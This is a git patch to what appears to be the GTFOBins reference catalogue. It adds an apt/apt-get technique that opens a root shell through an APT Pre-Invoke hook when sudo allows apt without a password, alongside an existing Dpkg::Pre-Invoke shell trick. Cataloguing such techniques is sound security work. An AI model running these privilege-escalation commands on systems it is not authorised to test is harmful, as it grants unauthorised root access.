From 21f760676c742569a68b6ffa416bbe4147e1744f Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 21 Jan 2019 16:28:20 +0100 Subject: [PATCH] Add alternative apt* shell technique Thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ Also related to #38. --- _gtfobins/apt-get.md | 2 ++ _gtfobins/apt.md | 2 ++ 2 files changed, 4 insertions(+) diff --git a/_gtfobins/apt-get.md b/_gtfobins/apt-get.md index 70c2f33..9426256 100644 --- a/_gtfobins/apt-get.md +++ b/_gtfobins/apt-get.md @@ -15,4 +15,6 @@ functions: TF=$(mktemp) echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF sudo apt-get install -c $TF sl + - description: When the shell exits the `update` command is actually executed. + code: sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh --- diff --git a/_gtfobins/apt.md b/_gtfobins/apt.md index 94d9df5..008e672 100644 --- a/_gtfobins/apt.md +++ b/_gtfobins/apt.md @@ -15,4 +15,6 @@ functions: TF=$(mktemp) echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF sudo apt install -c $TF sl + - description: When the shell exits the `update` command is actually executed. + code: sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh ---